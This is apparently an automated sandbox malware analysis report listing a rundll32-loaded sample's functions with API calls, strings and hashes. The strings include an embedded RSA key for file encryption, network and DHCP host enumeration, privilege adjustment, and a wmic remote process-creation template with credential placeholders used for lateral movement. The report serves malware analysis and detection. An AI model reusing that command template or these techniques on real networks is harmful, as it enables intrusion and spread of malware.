                                                • Instruction Fuzzy Hash: B2C15D75A5076A8FCB14CFA8C4A05EEB7B1FF88304F24A56AEC15E7340E7349A52CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58282 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,74DF0F10,?,?,02E58029,000000FF,?,?,?), ref: 02E582A8
                                                • NetApiBufferFree.NETAPI32(?,?,?,02E58029,000000FF,?,?,?), ref: 02E582C1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferCountFreeInfoServerTick
                                                • String ID:
                                                • API String ID: 2934114180-0
                                                • Opcode ID: 22b445b2cce8a4ec7079e8927949c94ef3b056bebe1e44b976c20109d4bc77b9
                                                • Instruction ID: 8a3d0ea2b3f58f69c64ecff036e9c4447a01f2369e33022b00f77b2c5b1367ea
                                                • Opcode Fuzzy Hash: 22b445b2cce8a4ec7079e8927949c94ef3b056bebe1e44b976c20109d4bc77b9
                                                • Instruction Fuzzy Hash: 421106767A03259FD724CE69DC81B6E77A9AB81B08F149129FD09CB180D770CD808650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5795A Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,02CD6160,?,02CD6160,?), ref: 02E5798B
                                                • NetApiBufferFree.NETAPI32(?), ref: 02E57A08
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferEnumFreeServer
                                                • String ID:
                                                • API String ID: 2429717511-0
                                                • Opcode ID: 70ec2b6c92435d37f1b330307dc3493bc96a30bdd0bb291cea410ac36797297e
                                                • Instruction ID: 59e2b7d665bb297f06fb17364cf741250f6c79153eca317ed4bcabb266ef1519
                                                • Opcode Fuzzy Hash: 70ec2b6c92435d37f1b330307dc3493bc96a30bdd0bb291cea410ac36797297e
                                                • Instruction Fuzzy Hash: 8D216A759A0269EBDB22CF44C840ADEFB79FF08708F219616FC15A2141D3709760CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5668A Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E5669A
                                                • GetTickCount.KERNEL32 ref: 02E566A2
                                                  • Part of subcall function 02E52068: closesocket.WS2_32(?), ref: 02E52076
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTickclosesocketmemset
                                                • String ID:
                                                • API String ID: 650736858-0
                                                • Opcode ID: 6a5b47d155990104362a5d683ac12f88bb5617b60cb6c954ab1bf51383d84f46
                                                • Instruction ID: 6e3cb23e3f01669dfec66af13dc27312632df433d94c09b9a9af4bf9a0e9bc14
                                                • Opcode Fuzzy Hash: 6a5b47d155990104362a5d683ac12f88bb5617b60cb6c954ab1bf51383d84f46
                                                • Instruction Fuzzy Hash: 15114836590229ABCF129FE1DC04FCF3F6AAF08784F509015FE0566164E736D928EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E571D6 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E571E7
                                                • LeaveCriticalSection.KERNEL32(?,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E5723E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: 4195180f94e38c078a682da19b1b18eaff47e56b7d2d7988631d7dc42f6957b1
                                                • Instruction ID: bf9e35fc83d6ae09d0e6992c549356195a180ec7fd7110a79679de8522ee73cf
                                                • Opcode Fuzzy Hash: 4195180f94e38c078a682da19b1b18eaff47e56b7d2d7988631d7dc42f6957b1
                                                • Instruction Fuzzy Hash: 74115779740A209FC725CF6AC884A5AF7E6BF88308B449529E84AC7311DB30E961CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56EDA Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrCmpIW.KERNELBASE(00000000,?), ref: 02E56EEF
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 466bc20b24b89237cf69b0bd00e40f0e536f501e40b38cbb06788b41bf867633
                                                • Instruction ID: 9ef1fac61f49faefb6557062c878ef00dd56af67834087526b59b1ccfa02732f
                                                • Opcode Fuzzy Hash: 466bc20b24b89237cf69b0bd00e40f0e536f501e40b38cbb06788b41bf867633
                                                • Instruction Fuzzy Hash: 00D05E310F5118EBCF015E64C808BAA7B98A700709F90D430BC19858A0CB31C2A0CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5C223 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: malloc
                                                • String ID:
                                                • API String ID: 2803490479-0
                                                • Opcode ID: 8b9f1e7de51a05d65cdca8ef3dc6850c79ae64e5049bba69088b5044e6cb7cb1
                                                • Instruction ID: f935d74e8d2a908f087e05ec8c133f9d1d136afc9d22ee1ae6072be75956a710
                                                • Opcode Fuzzy Hash: 8b9f1e7de51a05d65cdca8ef3dc6850c79ae64e5049bba69088b5044e6cb7cb1
                                                • Instruction Fuzzy Hash: 96B0123309830D5B8F04FED8E986C6A77DCEA54620B40D416FD1C8F640D931F5104A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 02E51BA0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 93encryptionmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BC6
                                                • LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,02E51D43,?), ref: 02E51BD6
                                                • CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BF8
                                                • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,02E51D43), ref: 02E51C1A
                                                • LocalAlloc.KERNEL32(00000040,02E51D43,?,?,?,02E51D43,?), ref: 02E51C25
                                                • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,02E51D43), ref: 02E51C42
                                                • CryptImportKey.ADVAPI32(5708458B,?,02E51D43,00000000,00000000,02E51D4F,?,?,?,02E51D43,?), ref: 02E51C5A
                                                • LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C66
                                                • LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C6F
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51BD0
                                                • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 02E51BF3
                                                • `oHu, xrefs: 02E51BFE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$Import
                                                • String ID: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y$Microsoft Enhanced RSA and AES Cryptographic Provider$`oHu
                                                • API String ID: 4237161685-1840210459
                                                • Opcode ID: db1ee4c0367c372a52ce8e3dee089a4b2cac0e1d4384663a868e6cb69e1e5287
                                                • Instruction ID: 355128134c0ae263bf3172a03052c97eeb9e21ba3c4ece20172c1ac9b85428bb
                                                • Opcode Fuzzy Hash: db1ee4c0367c372a52ce8e3dee089a4b2cac0e1d4384663a868e6cb69e1e5287
                                                • Instruction Fuzzy Hash: FB3180B5951228BFDB249B96CD48EDFBF7DEF09794F004050F909A6150D3718A50DBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E598AB Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02E598D8
                                                • PathAppendW.SHLWAPI(?,wbem\wmic.exe,?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E598EC
                                                • PathFileExistsW.SHLWAPI(?,?,wbem\wmic.exe,?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E598F3
                                                • wsprintfW.USER32 ref: 02E59913
                                                • wsprintfW.USER32 ref: 02E59927
                                                  • Part of subcall function 02E56BB0: wsprintfW.USER32 ref: 02E56BD3
                                                  • Part of subcall function 02E56BB0: EnterCriticalSection.KERNEL32(02E6F124,00000000,00000114,74DF0F00), ref: 02E56BFE
                                                  • Part of subcall function 02E56BB0: StrCatW.SHLWAPI(?,?), ref: 02E56C4C
                                                  • Part of subcall function 02E56BB0: StrCatW.SHLWAPI(?,02E6B110), ref: 02E56C52
                                                  • Part of subcall function 02E56BB0: LeaveCriticalSection.KERNEL32(02E6F124), ref: 02E56C65
                                                • wsprintfW.USER32 ref: 02E59968
                                                • GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E59971
                                                Strings
                                                • process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 , xrefs: 02E59921
                                                • %s /node:"%ws" /user:"%ws" /password:"%ws" , xrefs: 02E5990D
                                                • wbem\wmic.exe, xrefs: 02E598E6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$Path$CriticalFileSection$AppendDirectoryEnterErrorExistsFindLastLeaveNameSystem
                                                • String ID: %s /node:"%ws" /user:"%ws" /password:"%ws" $process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 $wbem\wmic.exe
                                                • API String ID: 2006178707-1103320628
                                                • Opcode ID: 69e741de526cca3721cf766a5a0a0c2682ed0f18cb6832e5b42eaa943c03e5c5
                                                • Instruction ID: ed57b543029c28b4e26bbb844a42276c5acda148d418800416477e3a5ee900d6
                                                • Opcode Fuzzy Hash: 69e741de526cca3721cf766a5a0a0c2682ed0f18cb6832e5b42eaa943c03e5c5
                                                • Instruction Fuzzy Hash: 822101362E0315EBD7209FA0CC84EABB3EDAF49714B40A42AF946C3110EB70D1818B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5908A Relevance: 16.6, APIs: 11, Instructions: 130memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,6F9B4950,00000000), ref: 02E590D1
                                                • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 02E590F3
                                                • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 02E5911F
                                                • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 02E59158
                                                • htonl.WS2_32(00000000), ref: 02E59187
                                                • htonl.WS2_32(00000000), ref: 02E59195
                                                • inet_ntoa.WS2_32(00000000), ref: 02E59198
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02E591B6
                                                • HeapFree.KERNEL32(00000000), ref: 02E591BD
                                                • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 02E591D2
                                                • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 02E591EB
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                • String ID:
                                                • API String ID: 4121633671-0
                                                • Opcode ID: 595173263136ffa2cfd7688aa97d2bd0b6cc592b4399e2b52e685f81238b2c00
                                                • Instruction ID: da1890e927ecb4750347e80c736c006e2850e6e13d4890745c890e8fef07111f
                                                • Opcode Fuzzy Hash: 595173263136ffa2cfd7688aa97d2bd0b6cc592b4399e2b52e685f81238b2c00
                                                • Instruction Fuzzy Hash: C141F6B1D50229EFCB11DFA9D9889EEFBB9FF08304F518456EA01E7210D7709A418FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51C7F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77encryptionmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,02E51D54,F0000000,?), ref: 02E51CA6
                                                • LocalAlloc.KERNEL32(00000040,?,?,02E51D54,F0000000,?), ref: 02E51CB1
                                                • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,02E51D54,F0000000,?), ref: 02E51CCC
                                                • CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51CE8
                                                • LocalAlloc.KERNEL32(00000040,F0000000,?,02E51D54,F0000000,?), ref: 02E51CF6
                                                • CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51D0F
                                                • LocalFree.KERNEL32(00000000,?,02E51D54,F0000000,?), ref: 02E51D1B
                                                • LocalFree.KERNEL32(02E51D54,?,02E51D54,F0000000,?), ref: 02E51D24
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51C85
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptLocal$AllocBinaryExportFreeString
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 402867008-63410773
                                                • Opcode ID: dfa63c54878e37b70e82e9a901dd9d7aa7607e1fc33f2a82199928518a97081e
                                                • Instruction ID: d791df283de6307ab02d78b630514397df0c2ae3901508ed185eaf2b5bf949d2
                                                • Opcode Fuzzy Hash: dfa63c54878e37b70e82e9a901dd9d7aa7607e1fc33f2a82199928518a97081e
                                                • Instruction Fuzzy Hash: E7217F7699021CFFEF109FE1DC80EAEBBB9EB04754F108465FA11A6150D7719E509B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E581BA Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 02E581DE
                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 02E581E5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 02E581F7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02E5821A
                                                • GetLastError.KERNEL32(?,00000000), ref: 02E58222
                                                • SetLastError.KERNEL32(?,?,00000000), ref: 02E58234
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 2365211911-0
                                                • Opcode ID: 494dbc1f7dbd13a8168675a971af7762006b1b98ad07bc13430c6bca42272c1e
                                                • Instruction ID: 2bc7376ebe980eb0b0bcb74bdc7a411e0a36c8985c4c73ed1fa7dc5c39a86891
                                                • Opcode Fuzzy Hash: 494dbc1f7dbd13a8168675a971af7762006b1b98ad07bc13430c6bca42272c1e
                                                • Instruction Fuzzy Hash: ED110975A91228BFDB009FE6DD889EFBFBCEF08644F504425FA05E2100D7708A958BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58677 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02E58688
                                                • Process32FirstW.KERNEL32(?,?), ref: 02E586AE
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 02E5873B
                                                • CloseHandle.KERNEL32(?), ref: 02E5874F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID: DK!.
                                                • API String ID: 420147892-431254139
                                                • Opcode ID: f013feef72d4bfcd93afb09528160df5d680ba326e7d36186a61d6dd10844ffe
                                                • Instruction ID: bf88028e0e3ebad233b7f43715f2ce2d806fd22a01e4ac5494639f825d9a1ed1
                                                • Opcode Fuzzy Hash: f013feef72d4bfcd93afb09528160df5d680ba326e7d36186a61d6dd10844ffe
                                                • Instruction Fuzzy Hash: C721D335D50329ABCB20DBA8CD887DDBBB4EB14368F2492A5EC52D61A0D7704BC1CA10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5C6D0 Relevance: 8.1, Strings: 6, Instructions: 578COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                • API String ID: 0-3089872807
                                                • Opcode ID: 6c568800db317edcb17d2bacf16eeddf42be6f4608f02650d835aed94363a355
                                                • Instruction ID: 4f33faa2687bbcdebeb9b7c8c462fb69c224878c990ffef565adccbcfafbc61c
                                                • Opcode Fuzzy Hash: 6c568800db317edcb17d2bacf16eeddf42be6f4608f02650d835aed94363a355
                                                • Instruction Fuzzy Hash: 08122972A683614FCB14CE38C5A425ABBE1BB84358F64F62EEC96D3B01D375E944C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E567AF Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E567C7
                                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02E56803
